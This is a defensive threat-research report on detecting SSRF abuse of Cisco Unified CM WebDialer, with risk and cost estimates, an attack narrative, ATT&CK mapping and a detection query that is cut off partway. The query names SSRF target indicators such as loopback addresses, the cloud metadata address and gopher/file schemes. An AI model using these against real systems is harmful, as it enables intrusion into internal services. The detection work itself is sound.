Published by: CyberDax LLC
Author: Edward “Tony” Dolley
Role: Founder / Principal Threat Researcher, CyberDax LLC
Publication Date: June 24, 2026
Publication Type: Cybersecurity Research Report / White Paper

BLUF

‍  Cisco Unified Communications Manager and Unified CM Session Management Edition exposure through WebDialer server-side request forgery creates a voice-control-plane risk because unauthenticated remote activity against affected WebDialer handling can force unintended backend request behavior through a trusted appliance context. In environments where WebDialer is enabled and reachable through management, reverse-proxy, load-balancer, VPN, provider-managed, or internet-adjacent paths, the detection requirement extends beyond patch status into WebDialer access behavior, source legitimacy, backend-fetch indicators, rare appliance egress, administrative change, service-state change, file activity, route-plan change, call-routing change, and voice-service instability.

This TTD does not treat the exposure as a single-CVE string-matching problem. It treats the vulnerability as a reusable detection model for externally reachable voice-management services where suspicious HTTP request handling can bridge into trusted appliance behavior. The priority for defenders is to identify suspicious WebDialer activity, enrich it with Cisco Unified CM / Unified CM SME asset and WebDialer enablement context, and correlate it with follow-on evidence of rare egress, control-plane manipulation, appliance-side compromise, or operational voice-service impact.

Executive Risk Translation

Cisco Unified CM and Unified CM SME commonly support enterprise voice routing, click-to-call workflows, directory-integrated communications, customer support paths, contact-center routing, and internal business communications. A WebDialer SSRF path is therefore not only a web-layer issue. It can become a voice-control-plane trust issue where suspicious HTTP activity against a communications appliance may lead to internal request abuse, unauthorized administrative activity, route-plan manipulation, call-routing change, service instability, or loss of confidence in systems that support customer contact, incident response, emergency coordination, and executive communications.

S5. Executive Risk Summary

Cisco Unified CM / Unified CM SME WebDialer exposure creates a high-priority detection and response concern because exploitation can originate remotely and target systems that often sit at the intersection of telephony, identity, directory services, call routing, and business continuity. The most important business risk is not only unauthorized interaction with a vulnerable service, but the possibility that a voice-control-plane appliance becomes a trusted pivot point for internal request activity, administrative change, rare egress, service disruption, or downstream operational impact.

The highest-risk environments are those where WebDialer is enabled, access paths are exposed beyond tightly controlled internal workflows, reverse-proxy or load-balancer logs do not preserve URI and query details, Unified CM administrative audit logs are incomplete, and rare appliance egress is not baselined. In those environments, defenders may only see fragments of the behavior: an unusual WebDialer request, a rare outbound connection, a service restart, a route-plan change, a call-routing anomaly, or voice-service instability. The value of this TTD is to connect those fragments into a behavior-led detection model.

The detection strategy focuses on suspicious WebDialer access and its relationship to rare egress, administrative change, file or service activity, route-plan change, call-routing change, and voice-control-plane instability. The S25 rule set supports NDR / Network Behavioral Analytics, SentinelOne, Splunk, Elastic, QRadar, and SIGMA coverage while avoiding unsupported cloud-only or malware-signature coverage.

S6. Executive Cost Summary

Low Impact Scenario

Estimated exposure: $85,000 to $275,000

A low-impact event involves suspicious WebDialer activity or exploitation attempts against a Cisco Unified CM / Unified CM SME environment where patching, WebDialer restriction, segmentation, logging, and administrative audit controls limit follow-on impact. Costs are driven by emergency validation, WebDialer exposure review, firewall and proxy log analysis, Unified CM administrative audit review, temporary WebDialer disablement or restriction, call-control integrity validation, and targeted detection deployment.

Moderate Impact Scenario

Estimated exposure: $275,000 to $950,000

A moderate-impact event involves suspicious WebDialer activity with credible follow-on evidence such as rare Unified CM egress, abnormal management-plane activity, suspicious administrative activity, service restart, file modification, route-plan change, call-routing change, or degraded confidence in voice-control-plane integrity. Costs are driven by incident response, forensic review, control-plane validation, call-routing verification, service restoration, change rollback, vendor escalation, communications disruption, helpdesk load, and enhanced monitoring across voice-management infrastructure.

High Impact Scenario

Estimated exposure: $950,000 to $4.2 million

A high-impact event involves confirmed appliance-side compromise, unauthorized administrator activity, malicious route-plan or call-routing modification, material voice-service disruption, sensitive configuration exposure, sustained communications outage, or loss of trust in Unified CM / Unified CM SME control-plane integrity. Costs are driven by emergency restoration, appliance rebuild or rollback, call-routing reconstruction, business communications disruption, contact-center or customer-support interruption, legal and regulatory review, executive communications, third-party incident response, and extended monitoring.

S6A. Key Cost Drivers

The primary cost driver is operational dependency on Cisco Unified CM / Unified CM SME for call routing, internal communications, customer-facing voice services, contact-center workflows, emergency coordination, incident response, and executive communications.

A second cost driver is the investigation burden created by SSRF-style behavior. Initial activity may appear as HTTP access to a legitimate WebDialer function, while the meaningful risk may appear later through backend request handling, rare egress, administrative change, service-state change, file activity, route-plan modification, or call-routing impact.

A third cost driver is control-plane trust validation. After suspicious activity, defenders may need to verify administrator accounts, route plans, call-routing rules, service status, configuration integrity, certificates, keys, backups, cluster state, directory integrations, and expected voice-platform egress before normal trust can be restored.

A fourth cost driver is telemetry maturity. Costs increase when URI paths and query strings are not retained, reverse-proxy logging is incomplete, Unified CM administrative audit telemetry is unavailable, file-integrity monitoring is not deployed, or rare egress baselines do not exist for voice-management assets.

A fifth cost driver is change-control ambiguity. Legitimate provider support, patch validation, monitoring, certificate management, backup jobs, route-plan changes, service restarts, and emergency remediation can resemble suspicious activity unless approved-source, approved-change, approved-maintenance, and baseline context are integrated into detection logic.

S6B. Compliance and Risk Context

Cisco Unified CM / Unified CM SME environments may support regulated communications, customer support lines, healthcare coordination, financial operations, emergency notification workflows, internal incident response, and executive communications. A compromise or loss of trust in the voice-control plane may create business-continuity, audit, legal, and customer-impact concerns even when the vulnerability itself is not primarily a data-theft issue.

Compliance exposure increases when suspicious WebDialer activity is followed by evidence of unauthorized administrative change, call-routing manipulation, service disruption, access to sensitive configuration files, certificate or key access, backup exposure, or unapproved egress from voice-management infrastructure. In those cases, the organization may need to demonstrate whether call routing, service availability, administrative access, and communications integrity remained intact.

Risk governance should treat this exposure as a control-plane integrity issue. Patching is necessary, but detection coverage should also validate WebDialer exposure, approved call-management workflows, administrative activity, appliance egress, route-plan integrity, service state, and voice-platform recovery readiness.

Risk Register Entry

Risk Title

Cisco Unified CM WebDialer SSRF and Voice-Control-Plane Appliance Compromise Exposure

Risk Description

Cisco Unified CM / Unified CM SME WebDialer exposure may allow suspicious external or unapproved source activity to abuse server-side request behavior through a trusted voice-control-plane appliance context. If follow-on activity occurs, the organization may face rare appliance egress, administrative change, file or service manipulation, route-plan change, call-routing impact, voice-service instability, or loss of trust in Unified CM control-plane integrity.

Affected Assets

Cisco Unified Communications Manager, Cisco Unified CM Session Management Edition, WebDialer-enabled assets, reverse proxies, load balancers, management interfaces, voice-management segments, administrator accounts, route-plan objects, call-routing configurations, service-state telemetry, file-integrity telemetry, monitoring systems, backup systems, and provider-support access paths.

Threat Event

Suspicious WebDialer access or SSRF-shaped request activity followed by rare Unified CM egress, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-service instability.

Business Impact

Potential communications disruption, call-routing integrity loss, contact-center interruption, customer-support degradation, incident-response communications disruption, emergency change activity, forensic investigation cost, service restoration cost, executive escalation, and reduced confidence in voice-control-plane integrity.

Likelihood

High where WebDialer is enabled, exposed beyond tightly controlled workflows, unpatched, weakly segmented, or insufficiently monitored.

Impact

High where Unified CM / Unified CM SME supports critical internal communications, customer-facing voice workflows, regulated operations, emergency response, or contact-center routing.

Inherent Risk Rating

High

Existing Controls

Cisco software updates, WebDialer restriction or disablement, network segmentation, WAF or reverse-proxy logging, firewall monitoring, administrative audit logging, approved-source controls, change-management processes, provider-access controls, backup procedures, and voice-platform monitoring.

Residual Risk

Moderate to high until WebDialer exposure is validated, patches are applied, suspicious WebDialer access is monitored, rare appliance egress is baselined, administrative and route-plan changes are audited, and S25 detection coverage is deployed across relevant platforms.

Recommended Treatment

Patch affected systems, disable or restrict WebDialer where not required, limit access to approved sources, preserve URI and query telemetry, baseline Unified CM egress, validate administrative audit logging, deploy S25 detection rules, monitor service and route-plan changes, and prepare voice-control-plane recovery procedures.

S10. Threat Overview

Cisco Unified CM and Unified CM SME WebDialer functionality can become a high-value exposure point when server-side request handling is reachable by untrusted or weakly controlled sources. The relevant threat model is unauthenticated or unapproved remote interaction with WebDialer-related HTTP request paths in a way that causes the appliance to process unintended backend request behavior from a trusted internal context.

The defensive concern is not limited to whether a single request matches a known exploit indicator. SSRF-style activity can be difficult to validate from one log line because the suspicious request may appear in web, reverse-proxy, load-balancer, WAF, or access telemetry, while the meaningful follow-on behavior may appear later in firewall, DNS, proxy, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, or NDR telemetry.

The threat should therefore be monitored as a behavior chain: suspicious WebDialer access, abnormal source or workflow context, SSRF-shaped request indicators, backend-fetch behavior, rare appliance egress, administrative or service-state change, file activity, route-plan or call-routing change, and voice-service instability. This TTD focuses on that chain rather than a single payload string.

S13. Targets and Exposure Surface

Primary Targets

Cisco Unified Communications Manager systems.

Cisco Unified CM Session Management Edition systems.

WebDialer-enabled Unified CM / Unified CM SME nodes.

Unified CM clusters and related voice-management infrastructure.

Management interfaces, reverse proxies, load balancers, VPN paths, and network zones that expose or route WebDialer traffic.

Secondary Targets

Administrative accounts used for Unified CM management.

Call-routing and route-plan configuration objects.

Service-state management functions.

Certificate, key, backup, and configuration stores.

Monitoring, backup, file-integrity, and provider-support systems with access to Unified CM infrastructure.

Voice-management subnets and NAT egress identities.

Exposure Conditions

WebDialer is enabled.

WebDialer access is reachable from untrusted, semi-trusted, provider-managed, remote-access, or internet-adjacent paths.

Reverse-proxy, WAF, or load-balancer telemetry does not preserve full URI and query details.

Unified CM administrative audit logs are incomplete or not forwarded to detection platforms.

Rare outbound communication from voice-control-plane assets is not baselined.

Approved source, approved workflow, approved provider support, and approved maintenance context are not integrated into detection logic.

S17. MITRE ATT&CK Chain Flow Mapping

Mapping Note

The MITRE ATT&CK mapping is intentionally narrow. It maps the observable behavior chain and likely follow-on activity used for detection engineering. It does not claim that every mapped technique occurs in every event.

Initial Access

T1190 - Exploit Public-Facing Application

Suspicious WebDialer access and SSRF-shaped request behavior against externally reachable or remotely accessible Unified CM / Unified CM SME WebDialer functionality maps most directly to exploitation of a public-facing or exposed application service.

Command and Control / Tool Transfer

T1105 - Ingress Tool Transfer

This mapping is conditional. It applies when follow-on telemetry shows rare outbound communication, file retrieval, transfer-tool execution, or appliance-adjacent activity consistent with downloading or staging external content after suspicious WebDialer activity.

Execution

T1059 - Command and Scripting Interpreter

This mapping is conditional. It applies only when follow-on telemetry shows unexpected shell, interpreter, command-line, service-wrapper, or endpoint-visible execution activity tied to the same Unified CM scope or supporting host.

Persistence / Server-Side Component Abuse

T1505 - Server Software Component

This mapping is conditional. It applies when follow-on telemetry shows suspicious file placement, service manipulation, application-writable path activity, or server-side component modification on or around Unified CM infrastructure.

Defense Evasion / Operational Concealment

T1562 - Impair Defenses

This mapping is conditional. It applies only where telemetry shows service disruption, logging impairment, monitoring bypass, or security-control interference tied to the same Unified CM scope.

Impact

T1499 - Endpoint Denial of Service

This mapping is conditional. It applies when suspicious WebDialer activity is followed by voice-service instability, service disruption, control-plane degradation, or communications availability impact.

S18. Attack Path Narrative

An attacker targets Cisco Unified CM / Unified CM SME WebDialer functionality through an exposed HTTP access path. The access path may be direct, reverse-proxied, load-balanced, VPN-mediated, provider-managed, or reachable through a management network.

The attacker sends WebDialer-related requests that deviate from approved click-to-call workflows, expected source ranges, expected user-agent patterns, or normal WebDialer request structure. The request may include SSRF-shaped indicators, backend-fetch behavior, encoded URL-like values, loopback or metadata-address references, abnormal response transitions, or failure-to-success behavior.

If the request is processed through the vulnerable path, the appliance may initiate unintended backend behavior from a trusted internal context. Defenders may observe the initial activity in WAF, reverse-proxy, load-balancer, web, or Cisco Unified CM access logs, while follow-on evidence may appear in firewall, DNS, proxy, NDR, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, or management-plane telemetry.

Post-exploitation behavior may include rare outbound communication, file creation or modification, service restart, administrative configuration change, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or endpoint-adjacent activity on supporting hosts.

The highest-confidence detection outcome occurs when suspicious WebDialer activity is correlated with rare Unified CM egress or voice-control-plane change using a stable Cisco Unified CM scope across node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management segment.

S20. TTP Analysis

WebDialer Access Abuse

The attacker interacts with WebDialer-related paths or parameters in ways that do not match approved click-to-call usage. Suspicious patterns include abnormal WebDialer path access, requests from unapproved sources, request bursts outside expected workflows, source reputation risk, and response anomalies.

SSRF-Shaped Request Behavior

The attacker attempts to influence server-side request handling through URL-like values, encoded scheme separators, loopback references, metadata-address references, backend host references, or abnormal parameter structures. The detection objective is not to match one exploit string, but to identify request patterns that indicate backend request abuse.

Trusted Appliance Context Abuse

Because SSRF behavior can cause a server to make requests from its own context, the appliance may become a trusted path into internal services, local interfaces, or backend functionality. This makes asset scope, WebDialer enablement state, source legitimacy, and backend behavior critical to triage.

Rare Egress

Follow-on communication from Unified CM / Unified CM SME nodes, backend hosts, management interfaces, NAT egress identities, or voice-management segments can indicate staging, callback, payload retrieval, or unintended backend request behavior. Detection should focus on destinations that are rare, unapproved, unknown reputation, suspicious reputation, newly observed, or outside the voice-platform baseline.

Control-Plane Change

Suspicious administrative changes, service restarts, file modifications, route-plan changes, call-routing changes, local user changes, certificate or key access, and voice-service instability may indicate compromise or operational impact. These events should be correlated with upstream WebDialer activity before being treated as exploit-linked.

Approved Activity Collision

Provider support, monitoring, vulnerability scanning, patch validation, certificate management, backup jobs, route-plan changes, service restarts, and emergency remediation can resemble suspicious follow-on activity. Detection content must include approved-source, approved-change, approved-maintenance, and baseline suppression to avoid over-alerting.

S20A. Adversary Tradecraft Summary

The tradecraft model is centered on abusing a legitimate voice-management web function to create unintended server-side behavior from a trusted appliance context. The first observable event may not look like compromise by itself. It may look like unusual WebDialer access, a strange query string, a response anomaly, or activity from an unexpected source.

The practical tradecraft sequence is:

·        Identify WebDialer-enabled Cisco Unified CM / Unified CM SME exposure.

·        Send abnormal WebDialer requests outside expected click-to-call workflows.

·        Use SSRF-shaped request content or backend-fetch behavior to test appliance-side request handling.

·        Observe response differences, error transitions, or success patterns.

·        Attempt follow-on appliance-side behavior, rare egress, file activity, service manipulation, administrative change, route-plan change, call-routing change, or voice-service disruption.

·        Blend or collide with legitimate provider support, scanning, monitoring, maintenance, or call-management integration traffic where possible.

The detection response should prioritize behavior correlation over string matching. A suspicious WebDialer request is a candidate signal. A suspicious WebDialer request followed by rare egress or voice-control-plane change is a higher-confidence compromise-path signal.

S21. Detection Strategy Overview

The detection strategy is to identify suspicious Cisco Unified CM / Unified CM SME WebDialer activity and correlate it with follow-on rare egress or voice-control-plane change. The strategy is behavior-led and does not depend on a single exploit string, actor name, IP address, or malware artifact.

Detection should begin with WebDialer access visibility from WAF, reverse-proxy, load-balancer, web, and Cisco Unified CM access telemetry. That activity should be enriched with Cisco Unified CM asset identity, WebDialer enablement state, approved-source context, approved workflow context, source reputation, and request-shape indicators.

Follow-on correlation should use network egress, DNS, firewall, proxy, NDR, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, and management-plane telemetry. The most important correlation key is a stable Cisco Unified CM scope that can connect node, cluster, backend host, management interface, NAT egress identity, administrator, and voice-management segment.

The highest-confidence detections combine suspicious WebDialer activity, Cisco Unified CM / Unified CM SME asset context, WebDialer-enabled context, rare egress or suspicious destination behavior, administrative or service-state change, and absence of approved maintenance, provider support, scanning, monitoring, or change context

Figure .

S22. Primary Detection Signals

Suspicious WebDialer Activity

Abnormal WebDialer access, requests from unapproved sources, access outside click-to-call workflows, abnormal WebDialer paths, SSRF-shaped query content, backend-fetch behavior, response anomalies, failure-to-success patterns, or source reputation risk.

Asset and Exposure Context

Cisco Unified CM / Unified CM SME asset identity, WebDialer enablement state, node identity, cluster identity, backend host, management interface, NAT egress identity, voice-management segment, and approved access path.

Rare Egress

Rare outbound connection, unexpected DNS query, newly observed destination, unapproved egress destination, suspicious or unknown destination reputation, egress from a voice-management segment, or egress not present in the Unified CM baseline.

Administrative and Service-State Change

Administrator creation or modification, administrative configuration change, abnormal management login, service restart, service modification, route-plan change, call-routing change, cluster communication anomaly, voice-service instability, or unusual service-state transition.

File and Host-Adjacent Activity

File creation, file modification, permission change, archive extraction, temporary path writes, configuration-file access, certificate or key access, backup export activity, unexpected shell activity, interpreter execution, process network connection, scheduled job creation, or local user modification.

Suppression and Context Signals

Approved WebDialer source, approved call-management integration, approved administrator, approved monitoring source, approved scanner, approved provider-managed source, approved patch validation, approved maintenance window, approved route-plan change, approved service restart, approved backup job, approved emergency remediation, and approved egress destination.

S23. Telemetry Requirements

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

NDR or network behavioral analytics telemetry.

Cisco Unified CM / Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved WebDialer source inventory.

Approved call-management integration inventory.

Approved administrator inventory.

Approved provider-support source inventory.

Approved scanner and monitoring source inventory.

Approved maintenance-window and change-control data.

Approved egress destination inventory.

Rare egress baseline for Unified CM / Unified CM SME nodes, management interfaces, NAT identities, and voice-management segments.

Endpoint or adjacent-host telemetry where available for management hosts, reverse proxies, monitoring hosts, backup hosts, file-integrity collectors, and voice-management support systems.

S24. Detection Opportunities and Gaps

Detection Opportunities

Suspicious WebDialer activity can be detected before confirmed compromise when defenders retain URI paths, query strings, source context, response status, and WebDialer workflow context.

Rare egress from Cisco Unified CM / Unified CM SME assets can provide strong follow-on evidence when voice-platform egress is tightly baselined.

Administrative audit and route-plan telemetry can expose control-plane manipulation that would not be obvious from web logs alone.

Service-state, file-integrity, and backup/export telemetry can help distinguish low-confidence probing from suspected appliance-side compromise.

QRadar CRE logic, Splunk summaries, Elastic transforms, NDR behavioral analytics, SentinelOne endpoint-visible telemetry, and SIGMA backend-convertible candidates provide complementary coverage when each platform is used for its proper role.

Detection Gaps

Detection is weakened where WebDialer access telemetry does not preserve full URI and query details.

Detection is weakened where Cisco Unified CM / Unified CM SME asset inventory is incomplete or WebDialer enablement state is unknown.

Detection is weakened where rare egress baselines do not exist for voice-control-plane assets.

Detection is weakened where Unified CM administrative audit logs, service-state telemetry, route-plan telemetry, and file-integrity telemetry are not forwarded to detection systems.

Detection is weakened where NAT, proxy, reverse-proxy, or load-balancer logs cannot reliably map activity back to the same Cisco Unified CM scope.

Detection is weakened where provider support, vulnerability scanning, monitoring, maintenance, route-plan changes, service restarts, and emergency remediation are not mapped into approved-change context.

S25 — Ultra-Tuned Detection Engineering Rules

NDR / Network Behavioral Analytics

Detection Viability Assessment

Implementation-ready as an NDR, WAF, reverse-proxy, load-balancer, firewall, or SIEM correlation pattern where URI-preserving HTTP telemetry, Cisco Unified CM / Unified CM SME asset inventory, WebDialer enablement state, DNS/proxy/firewall telemetry, source-network context, response-size context, and voice-management telemetry can be joined to the same Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Pure NetFlow is not sufficient because this detection requires WebDialer URI visibility, source context, request/response behavior, backend identity, and downstream correlation. Use this rule as a behavioral correlation pattern when the customer can combine HTTP-layer WebDialer activity with network egress, administrative audit, service-state, file-integrity, route-plan change, or voice-control-plane telemetry.

Rule

Cisco Unified CM WebDialer SSRF Attempt With Rare Egress or Voice-Control-Plane Correlation

Rule Format

Vendor-neutral NDR / WAF / reverse-proxy / load-balancer behavioral correlation rule requiring target-platform syntax conversion, local field mapping, local lookup implementation, WebDialer telemetry validation, Cisco Unified CM / Unified CM SME asset validation, and customer-specific tuning before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM or Unified CM SME WebDialer activity that may indicate SSRF-oriented request handling, abnormal WebDialer parameter use, backend fetch behavior, rare outbound communication, or downstream voice-control-plane management behavior tied to the same Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Detection Logic

Trigger when a Cisco Unified CM or Unified CM SME appliance with WebDialer enabled receives HTTP activity involving WebDialer paths, WebDialer servlet routes, WebDialer API routes, locally confirmed WebDialer endpoint variants, or WebDialer request-normalization anomalies from a source that is not an approved voice administrator, approved call-management integration, approved WebDialer workflow, approved monitoring system, approved vulnerability scanner, approved patch-validation source, approved provider-managed source, or approved maintenance source.

Assign medium severity when suspicious WebDialer endpoint activity occurs against a Unified CM or Unified CM SME appliance outside approved testing, monitoring, provider support, patch validation, or maintenance.

Assign high severity when suspicious WebDialer endpoint activity aligns with SSRF-shaped request context such as loopback references, link-local targets, private address ranges, internal hostnames, nested URL parameters, unexpected URL schemes, encoded URL schemes, double-encoded destinations, backend fetch errors, unexpected Host header behavior, repeated failure-to-success patterns, abnormal response-size transitions, abnormal request-size transitions, or WebDialer parameters that do not align with approved click-to-call workflows.

Assign high severity when suspicious WebDialer endpoint activity is followed within the local WebDialer network-correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer endpoint activity is followed within the local control-plane correlation window by confirmed appliance-side file creation, file modification, service restart, administrative configuration change, route-plan modification, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, or administrative identity.

Promote to critical when two or more high-confidence paths converge, or when suspicious WebDialer activity is followed by confirmed appliance-side compromise evidence, root-level access evidence, unauthorized administrator creation, malicious route-plan change, confirmed service manipulation, confirmed file-write activity, confirmed command execution, confirmed voice-control-plane instability, or confirmed call-routing integrity impact.

Required Telemetry

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

NDR session telemetry.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM version inventory.

Cisco WebDialer enablement inventory.

URI path and query-string preservation.

HTTP method, URI path, query string, status code, user agent, request size, response size, virtual host, backend host, backend IP, and timestamp.

Source IP and forwarded source IP fields.

DNS logs.

Proxy logs.

Approved voice administrator source lookup.

Approved call-management integration lookup.

Approved WebDialer workflow lookup.

Approved monitoring source lookup.

Approved scanner lookup.

Approved provider-managed source lookup.

Approved patch-validation source lookup.

Approved maintenance-window lookup.

Approved Cisco Unified CM appliance lookup.

Approved Cisco Unified CM SME appliance lookup.

Approved voice-management subnet lookup.

Approved Cisco Unified CM destination lookup.

Recently seen destination-domain and destination-IP baseline.

Engineering Implementation Instructions

Map HTTP method, URI path, query string, full URL, source IP, X-Forwarded-For, normalized source IP, user agent, HTTP status, request size, response size, virtual host, backend host, backend IP, Cisco Unified CM cluster identifier, Cisco Unified CM node identifier, Cisco Unified CM role, WebDialer enablement state, source host, destination domain, destination IP, DNS query, proxy action, network action, NAT egress identity, voice-management segment, administrator user, administrator action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to the customer’s local schema.

Normalize URL and query-string values before correlation. Decode URL-encoded values where safely available, preserve the original raw request fields for investigation, and create a combined normalized request field from URI path, query string, and full URL so defenders can identify private IP references, loopback references, link-local references, internal hostnames, nested URL parameters, unexpected URL schemes, and encoded destinations without requiring request-body logging.

Normalize source identity carefully. When X-Forwarded-For exists, extract the original client IP from the forwarded chain using the customer’s trusted-proxy policy rather than treating the entire X-Forwarded-For field as a single source IP. Preserve the full forwarded chain for triage.

Build the Cisco Unified CM and Unified CM SME asset groups from CMDB records, vulnerability-management inventory, Cisco voice-platform inventory, DNS records, reverse-proxy routing, load-balancer target groups, firewall objects, management subnet inventories, Cisco Unified CM cluster records, and WebDialer enablement records.

Create and validate local lookups for approved voice administrators, approved WebDialer integrations, approved call-management applications, approved monitoring systems, approved vulnerability scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved Cisco Unified CM appliances, approved Unified CM SME appliances, approved management subnets, approved outbound destinations, approved internal call-control systems, approved directory services, approved backup systems, approved DNS and NTP services, and recently seen destination baselines.

Validate URI visibility before deployment. This rule requires URI-preserving WAF, reverse-proxy, load-balancer, web access, application-layer, or server-side logging. Pure NetFlow, encrypted traffic without HTTP metadata, or firewall-only telemetry is not sufficient for WebDialer request detection.

Do not require request-body logging for production deployment. Request-body or parameter capture may support investigation, but the deployable correlation should work from endpoint path, query string, source context, response behavior, backend identity, SSRF-shaped destination indicators, egress behavior, and management-plane correlation.

Translate the Detection Query Pattern into the target NDR, WAF, proxy, firewall, or SIEM language using local event categories, asset groups, allowlists, enrichment fields, and time-window logic.

Validate joins between virtual host, backend host, Cisco Unified CM node, Unified CM SME node, Cisco Unified CM cluster, management interface, source IP, forwarded source IP, NAT egress identity, voice-management segment, administrative audit records, service-state telemetry, file-integrity records, and route-plan change records before alert-mode deployment.

Run the rule in hunt mode first to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, cluster communication, and expected voice-platform egress.

Treat TLS termination, URI preservation, source-IP preservation, backend-host mapping, Cisco Unified CM cluster mapping, WebDialer enablement mapping, administrator-source mapping, approved integration baselining, allowlist tuning, false-positive testing, query-performance validation, SOC triage fields, and alert-routing ownership as required local deployment work.

DRI Assessment

High resilience where URI visibility, Cisco Unified CM asset inventory, WebDialer enablement inventory, virtual-host mapping, backend-host mapping, source-context enrichment, DNS/proxy telemetry, approved-source enrichment, rare-destination baselining, administrative audit visibility, service-state telemetry, file-integrity telemetry, and route-plan change visibility are available. Resilience is materially lower where WebDialer URI visibility, WebDialer enablement inventory, or Unified CM administrative telemetry is unavailable.

DRI

8.6 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer endpoint activity and high when WebDialer activity aligns with SSRF-shaped request context, abnormal response transitions, rare egress, appliance-side file modification, service restart activity, administrative changes, route-plan changes, voice-service instability, or management access from unfamiliar sources.

Operational TCR

8.2 / 10

Full-Telemetry TCR

9.2 / 10

Limitations

Encrypted traffic without WAF, reverse-proxy, load-balancer, application-layer, or server-side HTTP logging may hide WebDialer URI paths and request parameters. Request bodies may not be logged or may be intentionally excluded for privacy, performance, or operational reasons. Legitimate click-to-call workflows, voice-platform monitoring, provider-managed support, vulnerability scanning, patch validation, cluster maintenance, backup activity, or emergency remediation may touch WebDialer routes or produce related management-plane activity. Critical promotion requires local correlation to appliance file telemetry, administrative audit logs, service-state telemetry, route-plan changes, management access, shell activity, or confirmed appliance-side compromise evidence.

Detection Query Pattern

Vendor-neutral NDR query pattern for Cisco Unified CM WebDialer SSRF-shaped activity with rare egress or voice-control-plane follow-on change. This pattern requires target-platform syntax conversion, URI-preserving WebDialer telemetry validation, Cisco Unified CM / Unified CM SME asset validation, WebDialer enablement validation, forwarded-source normalization, downstream voice-management telemetry validation, administrator-context validation, timing-window tuning, and environment-specific allowlisting before production deployment.

NetworkEvent AS WebDialerUpstreamSuspiciousActivity
WHERE WebDialerUpstreamSuspiciousActivity.DestinationAsset IN ASSET_GROUP (
"Cisco Unified CM Appliances",
"Cisco Unified CM SME Appliances",
"Cisco Unified CM Clusters",
"Cisco Unified CM Nodes",
"Cisco Unified CM WebDialer Services",
"Cisco Unified CM Management Interfaces",
"Cisco Unified CM Reverse Proxy Backends",
"Cisco Unified CM Load Balancer Backends",
"Cisco Voice Control-Plane Systems"
)
AND WebDialerUpstreamSuspiciousActivity.ServiceState IN ANY (
"webdialer_enabled",
"webdialer_route_exposed",
"webdialer_endpoint_reachable",
"webdialer_service_confirmed"
)
AND (
WebDialerUpstreamSuspiciousActivity.RequestPathCategory IN ANY (
"webdialer_path",
"webdialer_servlet_path",
"webdialer_api_path",
"locally_confirmed_webdialer_endpoint",
"unexpected_webdialer_endpoint_variant",
"webdialer_request_normalization_mismatch"
)
OR WebDialerUpstreamSuspiciousActivity.EventPattern IN ANY (
"abnormal_webdialer_access",
"webdialer_request_from_unapproved_source",
"webdialer_access_outside_click_to_call_workflow",
"webdialer_backend_fetch_behavior",
"webdialer_response_anomaly",
"webdialer_failure_to_success_pattern",
"suspicious_source_to_voice_management_plane"
)
OR WebDialerUpstreamSuspiciousActivity.SourceContext IN ANY (
"unfamiliar_internet_source",
"hosting_provider_source",
"residential_proxy_source",
"suspicious_asn",
"unusual_geography",
"vpn_ingress_source",
"source_not_in_voice_admin_baseline",
"source_not_in_webdialer_workflow_baseline",
"source_not_in_provider_managed_baseline"
)
)
AND (
WebDialerUpstreamSuspiciousActivity.RequestParameterRisk IN ANY (
"loopback_reference",
"link_local_reference",
"private_address_reference",
"internal_hostname_reference",
"nested_url_parameter",
"unexpected_url_scheme",
"encoded_url_scheme",
"double_encoded_destination",
"backend_fetch_error",
"host_header_anomaly",
"abnormal_request_size_transition",
"abnormal_response_size_transition"
)
OR WebDialerUpstreamSuspiciousActivity.DecodedRequestContent IN ANY (
"127.0.0.1",
"localhost",
"0.0.0.0",
"169.254.169.254",
"private_rfc1918_address",
"internal_hostname",
"http_url_inside_parameter",
"https_url_inside_parameter",
"file_url_inside_parameter",
"gopher_url_inside_parameter",
"encoded_http_scheme",
"encoded_https_scheme",
"encoded_file_scheme",
"encoded_gopher_scheme"
)
OR EVENT_NEAR WITHIN ENV_CUCM_WEBDIALER_NETWORK_CORRELATION_WINDOW (
NetworkEvent AS RareUnifiedCMEgress
WHERE RareUnifiedCMEgress.SourceAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND RareUnifiedCMEgress.EventPattern IN ANY (
"rare_outbound_connection",
"new_destination_for_cucm_node",
"new_destination_for_voice_management_segment",
"unexpected_external_egress",
"unexpected_dns_resolution",
"connection_to_unapproved_destination",
"connection_to_unknown_reputation_destination",
"connection_to_suspicious_reputation_destination",
"connection_to_unapproved_country",
